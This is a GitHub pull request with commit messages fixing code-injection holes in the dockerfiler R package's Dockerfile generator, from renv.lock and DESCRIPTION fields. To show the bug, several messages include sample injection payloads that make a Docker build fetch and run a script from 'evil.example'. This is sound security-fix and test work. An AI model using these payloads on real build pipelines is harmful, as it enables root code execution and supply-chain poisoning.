fix(security): validate the renv version resolved from the lockfile#112
Conversation
|
/copilot review |
There was a problem hiding this comment.
Pull request overview
This PR closes a high-severity command-injection vector in dock_from_renv() by ensuring the renv package version read from renv.lock is validated before it is interpolated into an R -e ... Dockerfile RUN line.
Changes:
- Apply
.validate_renv_version()to the resolvedrenv_versioneven when it comes fromlock$Packages$renv$Version. - Add a regression test that builds a malicious lockfile and asserts
dock_from_renv()errors onrenv_version. - Document the security fix in
NEWS.md.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 1 comment.
| File | Description |
|---|---|
R/dock_from_renv.R |
Validates lockfile-derived renv_version to prevent R code injection during Docker build. |
tests/testthat/test-dock_from_renv.R |
Adds a test ensuring malicious lockfile renv versions are rejected. |
NEWS.md |
Records the security fix in the 0.3.0 Security notes. |
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
| } | ||
| # The lockfile is untrusted input: its `Packages$renv$Version` is | ||
| # interpolated into the generated `R -e 'remotes::install_version(...)'` | ||
| # line, which runs as root at `docker build` time. Validate it with the | ||
| # same regex applied to a user-supplied `renv_version`. | ||
| if (!is.null(renv_version)) { | ||
| .validate_renv_version(renv_version) | ||
| } |
d79975a to
228c270
Compare
|
Folded in the Copilot suggestion (and pr-reviewer's Finding 2): |
|
/copilot review |
`dock_from_renv()` interpolates the `renv` package version into the
generated `R -e 'remotes::install_version("renv", version = "<x>")'`
line, which runs as root at `docker build` time. `.validate_renv_version()`
was only applied when the value came from a user-supplied `renv_version=`
argument; the fallback path that reads `lock$Packages$renv$Version` from
the (untrusted) lockfile skipped validation entirely. A crafted
`renv.lock` carrying e.g. `1.0.0"); system("..."); ("` would break out
of the inner R string literal and execute arbitrary code in the build
container.
Validate the resolved value inside the `if (missing(renv_version))`
block, right after the lockfile read, so the lockfile-fallback path is
guarded where it is resolved (the user-supplied path keeps its
entry-point validation; no double-check on a known-good value). The
validator's existing regex `^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$`
already rejects `"`, `;`, parens and whitespace, so a benign lockfile
(`renv 1.0.0`) still produces
`RUN R -e 'remotes::install_version("renv", version = "1.0.0")'`.
Also tightened the `.validate_r_version()` "`X.Y.Z Patched`" branch to
require a single literal space instead of `\s` (which in R matches a
newline / tab too): a lockfile with an embedded newline in `R$Version`
would otherwise pass validation and emit a two-line `FROM` directive.
Not command injection, but it could silently break `docker build`.
Tests added (red-first): a lockfile whose `Packages$renv$Version`
carries a `system()` payload must raise the `renv_version` validation
error rather than reaching the Dockerfile (verified red against the
unpatched function, green after the fix); and
`.validate_r_version("4.5.0\nPatched")` / `"...\tPatched"` must error
(verified red against the `\s` regex). Full test suite: 0 failures,
155 passing in the touched file. R CMD check: 0/0/0 (one transient
"unable to verify current time" host NOTE, unrelated).
228c270 to
6a278a3
Compare
|
Force-pushed |
|
/copilot review |
…an-comments PR #112 fixed a code-injection path in dock_from_renv() (the renv version resolved from the lockfile reached the generated `R -e 'remotes::install_version(...)'` line without validation). Mention it explicitly in the cran-comments.md Security section so the CRAN reviewer sees that the audit happened and the fix is in this submission. Also clarifies there is nothing to disclose-coordinate: no published dockerfiler version shipped the 0.3.0 changeset.
….md for 0.3.0 (#111) * docs(cran-prep): switch maintainer to Vincent + rewrite cran-comments.md for 0.3.0 Two coordinated edits ahead of the CRAN submission: 1. DESCRIPTION: swap the `cre` role from Colin Fay (`contact@colinfay.me`) to Vincent Guyader (`vincent@thinkr.fr`). Both remain listed as `aut`. Vincent pilots the 0.3.0 release; the maintainer change is coordinated between the two authors. CRAN's submission system will emit a "New maintainer" note and require email confirmation from the previous maintainer. 2. cran-comments.md: replace the previous-release boilerplate (CRAN feedback on `download.file()` graceful failure) with the actual 0.3.0 release notes: - Test environments (local + GHA + win-builder placeholder) - Maintainer change context - Major changes since 0.2.6 grouped as Breaking changes / New features / Security hardening / Bug fixes - Reverse-deps note (golem unaffected by vendored renv removal) - Coverage note (99.84%, single defensive guard uncovered) R CMD check --as-cran: 0 errors / 0 warnings / 1 note ("unable to verify current time" host glitch, unrelated). devtools::test(): no behavioural change (no R/, NAMESPACE, Rd or test impact in this commit). * docs(cran-prep): apply pr-reviewer rewording on cran-comments.md Three changes from the pr-reviewer pass: 1. Test environments: replace the literal `TODO` placeholder for `check_win_devel()` with explicit "submitted in parallel; the result will follow by email" phrasing. Submitting a file with `TODO` reads as an unfinished checklist and risks an immediate bounce from the CRAN review queue. 2. Maintainer change: spell out the email-confirmation protocol explicitly ("the previous maintainer ... will confirm by replying to the automated email from CRAN's submission system"), instead of relying on the vaguer "coordinated between the two authors" phrasing. Makes clear we know the handover is gated on Colin's reply, not on internal coordination. 3. R CMD check results: keep `0/0/0` as the canonical result but add a one-line caveat about the transient "unable to verify current time" host-clock NOTE so a CRAN reviewer is not surprised if win-builder surfaces it. * docs(cran-prep): reverse-deps - replace revdepcheck claim with honest manual verification revdepcheck::revdep_check() was attempted but its install phase on the local host stalled on Bioconductor / heavy-stats deps (ade4, Biobase, ape) pulled in by {AbSolution}. Rather than keep an unverified claim in cran-comments.md, replace it with the manual verification that does answer the relevant question: the only breaking *symbol* removal in 0.3.0 is `dockerfiler::renv`, and a GitHub-wide code search returns zero references to it outside `ThinkR-open/dockerfiler` (our own NEWS) and `cran/dockerfiler` (the 0.2.7 mirror). Combined with the explicit local grep of {golem}, this shows none of the 3 declared revdeps (golem, AbSolution, shiny2docker) consume the removed symbol. Default-value flips (FROM, repos, user) are behavioural and preserve call-site compatibility. * docs(cran-prep): note the dock_from_renv lockfile-injection fix in cran-comments PR #112 fixed a code-injection path in dock_from_renv() (the renv version resolved from the lockfile reached the generated `R -e 'remotes::install_version(...)'` line without validation). Mention it explicitly in the cran-comments.md Security section so the CRAN reviewer sees that the audit happened and the fix is in this submission. Also clarifies there is nothing to disclose-coordinate: no published dockerfiler version shipped the 0.3.0 changeset.
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:
1. `build_from_source = FALSE`: the `Package:` field (`read.dcf(path)[1]`)
goes into the `COPY <pkg>_*.tar.gz /app.tar.gz` directive and the
`list.files()` tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
`Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
(`desc::desc_get_deps(path)$package`) goes into a generated
`remotes::install_version("<name>", ...)` install RUN.
`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as
Package: app
RUN curl -s https://evil.example/x.sh | sh #
or
Imports:
evilpkg
RUN curl -s https://evil.example/x.sh | sh #
yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.
Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.
Tests added (red-first), one per path: a `DESCRIPTION` whose
`Package:` field, resp. whose `Imports:` field, carries a
continuation-line `RUN` payload must raise the package-name validation
error rather than reaching the Dockerfile. Verified red against the
unpatched function -- in both cases the payload landed in the
generated Dockerfile as a standalone `RUN` line -- and green after the
fix; benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:
1. `build_from_source = FALSE`: the `Package:` field goes into the
`COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
`Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
(`desc::desc_get_deps(path)$package`) goes into a generated
`remotes::install_version("<name>", ...)` install RUN.
`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as
Package: app
RUN curl -s https://evil.example/x.sh | sh #
or
Imports:
evilpkg
RUN curl -s https://evil.example/x.sh | sh #
yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.
Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.
Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
instead of positionally (`read.dcf(path)[1]`): DCF field order is
not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
(`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
`sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
the CRAN grammar, e.g. `R.utils`) was being treated as a regex
wildcard and could `file.remove()` a sibling package's tarball
(`RZutils_*.tar.gz`).
Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:
1. `build_from_source = FALSE`: the `Package:` field goes into the
`COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
`Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
(`desc::desc_get_deps(path)$package`) goes into a generated
`remotes::install_version("<name>", ...)` install RUN.
`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as
Package: app
RUN curl -s https://evil.example/x.sh | sh #
or
Imports:
evilpkg
RUN curl -s https://evil.example/x.sh | sh #
yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.
Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.
Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
instead of positionally (`read.dcf(path)[1]`): DCF field order is
not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
(`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
`sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
the CRAN grammar, e.g. `R.utils`) was being treated as a regex
wildcard and could `file.remove()` a sibling package's tarball
(`RZutils_*.tar.gz`).
Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
Security fix — HIGH severity
Found by an internal security audit during 0.3.0 CRAN prep.
The bug
dock_from_renv()interpolates therenvpackage version into the generated Dockerfile line:.validate_renv_version()was only called whenrenv_versioncame from a user-supplied argument (R/dock_from_renv.R:187-189). The fallback path —renv_version <- lock$Packages$renv$Version— reads the value straight from the (untrusted)renv.lockand skipped validation entirely.A crafted lockfile:
{"Packages": {"renv": {"Version": "1.0.0\"); system(\"curl evil.example/x | sh\"); (\""}}}produces:
docker buildthen executessystem(...)as root in the build container — access to build secrets,~/.ssh, network exfil, supply-chain poisoning of the produced image. The lockfile is a plausible attacker-controlled artifact (received from a colleague, a vendored project, a CI cache). Downstream packages (golem,AbSolution,shiny2docker) that calldock_from_renv()on an unaudited lockfile inherit the exposure.The injection uses only
"and R syntax, so the outer shell'...'quoting stays intact —.validate_lockfile/ shell-metachar guards don't catch it.This path predates 0.3.0 (it existed while the vendored
{renv}parser was in use). The 0.3.0 shell-context hardening (#109) added.validate_renv_version()but only wired it to the user-supplied argument; this PR closes the lockfile-fallback gap.The fix
Apply
.validate_renv_version()to the resolved value regardless of source, right after the lockfile-resolution block:The validator's existing regex
^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$already rejects",;, parens, whitespace — a benign lockfile (renv 1.0.0) still producesRUN R -e 'remotes::install_version("renv", version = "1.0.0")'.Test (red-first)
tests/testthat/test-dock_from_renv.R: a lockfile whosePackages$renv$Versioncarries asystem()payload must raise therenv_versionvalidation error rather than reaching the Dockerfile.RUNline..validate_renv_version()raises.Full test suite:
FAIL 0 | WARN 1 | SKIP 0 | PASS 153(the WARN is a pre-existing rlang lifecycle deprecation from a dependency, unrelated).R CMD check: 0 errors / 0 warnings / 1 note (transient "unable to verify current time" host-clock NOTE, unrelated).Scope confirmed complete
lock$Packages$renv$Versionwas the only untrusted lockfile field reaching a codegen shell sink without validation:lock$R$Version→.validate_r_version()is called (R/dock_from_renv.R:225) before it reaches theFROMdirective.names(lock$Packages)→ passed as a query topak::pkg_sysreqs; only pak's curated Debian-package output reachesRUN, not the lockfile names. The lockfile'sSource/Repository/RemoteReposare consumed byrenv::restore()inside the container, not interpolated by dockerfiler.Test plan
renv 1.0.0) regression passes.devtools::test(): 0 failures.R CMD check: 0/0/0 (one transient host NOTE).pr-revieweragent: APPROVE, fix confirmed complete.NEWS
Added under
## SecurityinNEWS.md(0.3.0).